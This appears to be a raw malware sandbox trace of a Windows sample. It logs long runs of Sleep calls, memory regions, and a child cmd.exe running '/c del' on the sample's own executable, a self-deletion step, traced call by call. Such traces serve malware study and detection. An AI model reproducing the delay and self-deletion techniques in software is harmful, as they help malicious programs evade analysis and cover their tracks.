Sleep (dwMilliseconds=0x7d0) [0304.764] Sleep (dwMilliseconds=0x7d0) [0304.787] Sleep (dwMilliseconds=0x7d0) [0304.803] Sleep (dwMilliseconds=0x7d0) [0304.810] Sleep (dwMilliseconds=0x7d0) [0304.822] Sleep (dwMilliseconds=0x7d0) [0304.833] Sleep (dwMilliseconds=0x7d0) [0304.834] Sleep (dwMilliseconds=0x7d0) [0304.876] Sleep (dwMilliseconds=0x7d0) [0304.878] Sleep (dwMilliseconds=0x7d0) [0304.885] Sleep (dwMilliseconds=0x7d0) [0304.896] Sleep (dwMilliseconds=0x7d0) [0304.897] Sleep (dwMilliseconds=0x7d0) [0304.915] Sleep (dwMilliseconds=0x7d0) [0304.916] Sleep (dwMilliseconds=0x7d0) [0304.927] Sleep (dwMilliseconds=0x7d0) [0304.931] Sleep (dwMilliseconds=0x7d0) [0304.942] Sleep (dwMilliseconds=0x7d0) [0304.943] Sleep (dwMilliseconds=0x7d0) [0304.955] Sleep (dwMilliseconds=0x7d0) [0305.118] Sleep (dwMilliseconds=0x7d0) [0305.178] Sleep (dwMilliseconds=0x7d0) [0305.193] Sleep (dwMilliseconds=0x7d0) [0305.203] Sleep (dwMilliseconds=0x7d0) [0305.206] Sleep (dwMilliseconds=0x7d0) [0305.208] Sleep (dwMilliseconds=0x7d0) [0305.218] Sleep (dwMilliseconds=0x7d0) [0305.220] Sleep (dwMilliseconds=0x7d0) [0305.230] Sleep (dwMilliseconds=0x7d0) [0305.241] Sleep (dwMilliseconds=0x7d0) [0305.242] Sleep (dwMilliseconds=0x7d0) [0305.245] Sleep (dwMilliseconds=0x7d0) [0305.262] Sleep (dwMilliseconds=0x7d0) [0305.277] Sleep (dwMilliseconds=0x7d0) [0305.288] Sleep (dwMilliseconds=0x7d0) [0305.291] Sleep (dwMilliseconds=0x7d0) [0305.292] Sleep (dwMilliseconds=0x7d0) [0305.305] Sleep (dwMilliseconds=0x7d0) [0305.307] Sleep (dwMilliseconds=0x7d0) [0305.319] Sleep (dwMilliseconds=0x7d0) [0305.321] Sleep (dwMilliseconds=0x7d0) [0305.336] Sleep (dwMilliseconds=0x7d0) [0305.339] Sleep (dwMilliseconds=0x7d0) [0305.341] Sleep (dwMilliseconds=0x7d0) [0305.351] Sleep (dwMilliseconds=0x7d0) [0305.353] Sleep (dwMilliseconds=0x7d0) [0305.364] Sleep (dwMilliseconds=0x7d0) [0305.376] Sleep (dwMilliseconds=0x7d0) [0305.378] Sleep (dwMilliseconds=0x7d0) [0305.389] Sleep (dwMilliseconds=0x7d0) [0305.391] Sleep (dwMilliseconds=0x7d0) [0305.402] Sleep (dwMilliseconds=0x7d0) [0305.403] Sleep (dwMilliseconds=0x7d0) [0305.420] Sleep (dwMilliseconds=0x7d0) [0305.424] Sleep (dwMilliseconds=0x7d0) [0305.435] Sleep (dwMilliseconds=0x7d0) [0305.441] Sleep (dwMilliseconds=0x7d0) [0305.454] Sleep (dwMilliseconds=0x7d0) [0305.480] Sleep (dwMilliseconds=0x7d0) [0305.498] Sleep (dwMilliseconds=0x7d0) [0305.512] Sleep (dwMilliseconds=0x7d0) [0305.523] Sleep (dwMilliseconds=0x7d0) [0305.533] Sleep (dwMilliseconds=0x7d0) [0305.549] Sleep (dwMilliseconds=0x7d0) [0305.551] Sleep (dwMilliseconds=0x7d0) [0305.575] Sleep (dwMilliseconds=0x7d0) [0305.582] Sleep (dwMilliseconds=0x7d0) [0305.590] Sleep (dwMilliseconds=0x7d0) [0305.604] Sleep (dwMilliseconds=0x7d0) [0305.840] Sleep (dwMilliseconds=0x7d0) [0306.172] Sleep (dwMilliseconds=0x7d0) [0306.800] Sleep (dwMilliseconds=0x7d0) [0308.559] Sleep (dwMilliseconds=0x7d0) [0308.808] Sleep (dwMilliseconds=0x7d0) [0308.820] Sleep (dwMilliseconds=0x7d0) [0308.829] Sleep (dwMilliseconds=0x7d0) [0308.831] Sleep (dwMilliseconds=0x7d0) [0308.841] Sleep (dwMilliseconds=0x7d0) [0310.517] Sleep (dwMilliseconds=0x7d0) [0310.577] Sleep (dwMilliseconds=0x7d0) [0310.710] Sleep (dwMilliseconds=0x7d0) [0311.197] Sleep (dwMilliseconds=0x7d0) [0311.237] Sleep (dwMilliseconds=0x7d0) [0311.251] Sleep (dwMilliseconds=0x7d0) [0311.267] Sleep (dwMilliseconds=0x7d0) [0311.281] Sleep (dwMilliseconds=0x7d0) [0311.302] Sleep (dwMilliseconds=0x7d0) [0311.310] Sleep (dwMilliseconds=0x7d0) [0311.322] Sleep (dwMilliseconds=0x7d0) [0311.335] Sleep (dwMilliseconds=0x7d0) [0311.350] Sleep (dwMilliseconds=0x7d0) [0311.396] Sleep (dwMilliseconds=0x7d0) [0311.407] Sleep (dwMilliseconds=0x7d0) [0311.420] Sleep (dwMilliseconds=0x7d0) [0311.457] Sleep (dwMilliseconds=0x7d0) [0311.489] Sleep (dwMilliseconds=0x7d0) [0311.529] Sleep (dwMilliseconds=0x7d0) [0311.542] Sleep (dwMilliseconds=0x7d0) [0311.546] Sleep (dwMilliseconds=0x7d0) [0311.616] Sleep (dwMilliseconds=0x7d0) [0311.637] Sleep (dwMilliseconds=0x7d0) [0311.644] Sleep (dwMilliseconds=0x7d0) [0311.727] Sleep (dwMilliseconds=0x7d0) [0311.731] Sleep (dwMilliseconds=0x7d0) [0311.748] Sleep (dwMilliseconds=0x7d0) [0311.755] Sleep (dwMilliseconds=0x7d0) [0311.956] Sleep (dwMilliseconds=0x7d0) [0311.971] Sleep (dwMilliseconds=0x7d0) [0311.987] Sleep (dwMilliseconds=0x7d0) [0311.990] Sleep (dwMilliseconds=0x7d0) [0311.997] Sleep (dwMilliseconds=0x7d0) [0312.006] Sleep (dwMilliseconds=0x7d0) [0312.019] Sleep (dwMilliseconds=0x7d0) [0312.093] Sleep (dwMilliseconds=0x7d0) [0312.100] Sleep (dwMilliseconds=0x7d0) [0312.283] Sleep (dwMilliseconds=0x7d0) [0312.352] Sleep (dwMilliseconds=0x7d0) [0312.376] Sleep (dwMilliseconds=0x7d0) [0312.394] Sleep (dwMilliseconds=0x7d0) [0312.408] Sleep (dwMilliseconds=0x7d0) [0312.424] Sleep (dwMilliseconds=0x7d0) [0312.452] Sleep (dwMilliseconds=0x7d0) [0312.472] Sleep (dwMilliseconds=0x7d0) [0312.515] Sleep (dwMilliseconds=0x7d0) [0312.542] Sleep (dwMilliseconds=0x7d0) [0312.561] Sleep (dwMilliseconds=0x7d0) [0312.575] Sleep (dwMilliseconds=0x7d0) [0312.580] Sleep (dwMilliseconds=0x7d0) [0313.154] Sleep (dwMilliseconds=0x7d0) [0313.160] Sleep (dwMilliseconds=0x7d0) [0313.181] Sleep (dwMilliseconds=0x7d0) [0313.191] Sleep (dwMilliseconds=0x7d0) [0313.195] Sleep (dwMilliseconds=0x7d0) [0313.211] Sleep (dwMilliseconds=0x7d0) [0313.268] Sleep (dwMilliseconds=0x7d0) Thread: id = 89 os_tid = 0xe4c Thread: id = 90 os_tid = 0xe44 Thread: id = 98 os_tid = 0xe50 Thread: id = 99 os_tid = 0xe48 Thread: id = 107 os_tid = 0x13fc Thread: id = 109 os_tid = 0xf5c Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x252bd000" os_pid = "0xfec" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xf98" cmd_line = "/c del \"C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1260 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1261 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1262 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1263 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1264 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1265 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1266 start_va = 0xd20000 end_va = 0xd71fff monitored = 1 entry_point = 0xd34fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1267 start_va = 0xd80000 end_va = 0x4d7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 1268 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1269 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1270 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1271 start_va = 0x7fff0000 end_va = 0x7dfb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1272 start_va = 0x7dfb61c50000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb61c50000" filename = "" Region: id = 1273 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1274 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 1275 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1276 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1277 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1280 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1281 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1282 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1283 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1284 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1285 start_va = 0x400000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1286 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1287 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1288 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1289 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1354 start_va = 0x5a0000 end_va = 0x65dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1355 start_va = 0x76ff0000 end_va = 0x770adfff monitored = 0 entry_point = 0x77025630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1356 start_va = 0x530000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1357 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1358 start_va = 0x760000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1359 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1360 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Thread: id = 82 os_tid = 0xb2c [0187.218] GetProcAddress (hModule=0x74a40000, lpProcName="SetConsoleInputExeNameW") returned 0x74f7b440 [0187.218] GetProcessHeap () returned 0x430000 [0187.218] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x400a) returned 0x43c528 [0187.218] GetProcessHeap () returned 0x430000 [0187.219] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x43c528) returned 1 [0187.219] _wcsicmp (_String1="del", _String2=")") returned 59 [0187.219] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0187.219] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0187.219] _wcsicmp (_String1="IF", _String2="del") returned 5 [0187.219] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0187.219] _wcsicmp (_String1="REM", _String2="del") returned 14 [0187.219] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0187.219] GetProcessHeap () returned 0x430000 [0187.219] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x439020 [0187.219] GetProcessHeap () returned 0x430000 [0187.219] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x10) returned 0x430578 [0187.220] GetProcessHeap () returned 0x430000 [0187.220] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x54) returned 0x439080 [0187.222] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0187.223] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0187.223] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0187.223] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0187.223] GetProcessHeap () returned 0x430000 [0187.223] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa0) returned 0x4390e0 [0187.223] GetProcessHeap () returned 0x430000 [0187.223] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x4390e0, Size=0x54) returned 0x4390e0 [0187.223] GetProcessHeap () returned 0x430000 [0187.223] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x4390e0) returned 0x54 [0187.224] GetProcessHeap () returned 0x430000 [0187.224] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x5c) returned 0x439140 [0187.224] GetProcessHeap () returned 0x430000 [0187.224] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa0) returned 0x4391a8 [0187.224] GetProcessHeap () returned 0x430000 [0187.224] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x4391a8, Size=0x54) returned 0x4391a8 [0187.224] GetProcessHeap () returned 0x430000 [0187.224] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x4391a8) returned 0x54 [0187.224] GetProcessHeap () returned 0x430000 [0187.224] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4e) returned 0x439208 [0187.224] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19f818 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0187.224] GetProcessHeap () returned 0x430000 [0187.225] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x38) returned 0x439260 [0187.225] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19e888 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0187.225] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19eabc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x19eac0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19eabc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0187.225] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0187.225] GetProcessHeap () returned 0x430000 [0187.225] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2c) returned 0x4392a0 [0187.225] GetProcessHeap () returned 0x430000 [0187.225] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x258) returned 0x4392d8 [0187.225] _wcsicmp (_String1="gIkAOpZB.exe", _String2=".") returned 57 [0187.225] _wcsicmp (_String1="gIkAOpZB.exe", _String2="..") returned 57 [0187.225] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\gikaopzb.exe")) returned 0x20 [0187.225] GetProcessHeap () returned 0x430000 [0187.225] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x210) returned 0x4305c8 [0187.226] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4305d0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0187.226] SetErrorMode (uMode=0x0) returned 0x1 [0187.226] SetErrorMode (uMode=0x1) returned 0x0 [0187.226] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", nBufferLength=0x104, lpBuffer=0x19eee8, lpFilePart=0x19eebc | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", lpFilePart=0x19eebc*="gIkAOpZB.exe") returned 0x22 [0187.226] SetErrorMode (uMode=0x1) returned 0x1 [0187.226] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0187.226] GetProcessHeap () returned 0x430000 [0187.226] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x258) returned 0x4307e0 [0187.226] _wcsicmp (_String1="gIkAOpZB.exe", _String2=".") returned 57 [0187.226] _wcsicmp (_String1="gIkAOpZB.exe", _String2="..") returned 57 [0187.226] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\gikaopzb.exe")) returned 0x20 [0187.226] GetProcessHeap () returned 0x430000 [0187.226] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x22) returned 0x439538 [0187.226] GetProcessHeap () returned 0x430000 [0187.226] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x34) returned 0x439568 [0187.226] GetProcessHeap () returned 0x430000 [0187.226] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x34) returned 0x4395a8 [0187.226] GetProcessHeap () returned 0x430000 [0187.226] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x808) returned 0x43a1f8 [0187.226] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", fInfoLevelId=0x0, lpFindFileData=0x43a204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43a204) returned 0x4395e8 [0187.227] GetProcessHeap () returned 0x430000 [0187.227] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x14) returned 0x4377a0 [0187.227] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0187.227] NtOpenFile (in: FileHandle=0x19edbc, DesiredAccess=0x10000, ObjectAttributes=0x19ed84*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19edac, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x19edbc*=0xa4, IoStatusBlock=0x19edac*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0187.228] RtlReleaseRelativeName () returned 0x19ed9c [0187.228] RtlFreeAnsiString (AnsiString="\\") [0187.228] NtQueryVolumeInformationFile (in: FileHandle=0xa4, IoStatusBlock=0x19ece8, FsInformation=0x19ecf0, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x19ece8, FsInformation=0x19ecf0) returned 0x0 [0187.228] CloseHandle (hObject=0xa4) returned 1 [0187.236] FindNextFileW (in: hFindFile=0x4395e8, lpFindFileData=0x43a204 | out: lpFindFileData=0x43a204*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a348f12, ftCreationTime.dwHighDateTime=0x1d80c8a, ftLastAccessTime.dwLowDateTime=0x2a348f12, ftLastAccessTime.dwHighDateTime=0x1d80c8a, ftLastWriteTime.dwLowDateTime=0x2a3ebc2b, ftLastWriteTime.dwHighDateTime=0x1d80c8a, nFileSizeHigh=0x0, nFileSizeLow=0x99000, dwReserved0=0x0, dwReserved1=0x0, cFileName="gIkAOpZB.exe", cAlternateFileName="")) returned 0 [0187.237] GetLastError () returned 0x12 [0187.237] FindClose (in: hFindFile=0x4395e8 | out: hFindFile=0x4395e8) returned 1 [0187.237] GetProcessHeap () returned 0x430000 [0187.238] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x43a1f8) returned 1 [0187.238] GetProcessHeap () returned 0x430000 [0187.238] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x4395a8) returned 1 [0187.238] GetProcessHeap () returned 0x430000 [0187.239] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x439538) returned 1 [0187.239] GetProcessHeap () returned 0x430000 [0187.239] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x439568) returned 1 [0187.239] GetProcessHeap () returned 0x430000 [0187.239] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x4307e0) returned 1 [0187.240] GetProcessHeap () returned 0x430000 [0187.240] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x4305c8) returned 1 [0187.240] GetProcessHeap () returned 0x430000 [0187.240] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x4392d8) returned 1 [0187.241] GetProcessHeap () returned 0x430000 [0187.241] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x4392a0) returned 1 [0187.241] GetProcessHeap () returned 0x430000 [0187.241] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x439260) returned 1 [0187.241] GetProcessHeap () returned 0x430000 [0187.241] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x439208) returned 1 [0187.242] GetProcessHeap () returned 0x430000 [0187.242] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x4391a8) returned 1 [0187.242] _get_osfhandle (_FileHandle=1) returned 0x3c [0187.242] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0187.242] _get_osfhandle (_FileHandle=1) returned 0x3c [0187.242] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd4f40c | out: lpMode=0xd4f40c) returned 1 [0187.243] _get_osfhandle (_FileHandle=0) returned 0x38 [0187.243] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd4f408 | out: lpMode=0xd4f408) returned 1 [0187.243] SetConsoleInputExeNameW () returned 0x1 [0187.243] GetConsoleOutputCP () returned 0x1b5 [0187.243] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd4f460 | out: lpCPInfo=0xd4f460) returned 1 [0187.243] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.244] exit (_Code=0) Thread: id = 86 os_tid = 0xc40 Process: id = "9" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x24fa1000" os_pid = "0x11d0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xfec" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1290 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1291 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1292 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1293 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1294 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1295 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1296 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1297 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1298 start_va = 0x7ff752060000 end_va = 0x7ff752070fff monitored = 0 entry_point = 0x7ff7520616b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1299 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1300 start_va = 0xc0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1301 start_va = 0x7ffb5ee60000 end_va = 0x7ffb5f047fff monitored = 0 entry_point = 0x7ffb5ee8ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1302 start_va = 0x7ffb60950000 end_va = 0x7ffb609fcfff monitored = 0 entry_point = 0x7ffb609681a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1303 start_va = 0x10000 end_va = 0x1ffff monitored = 1 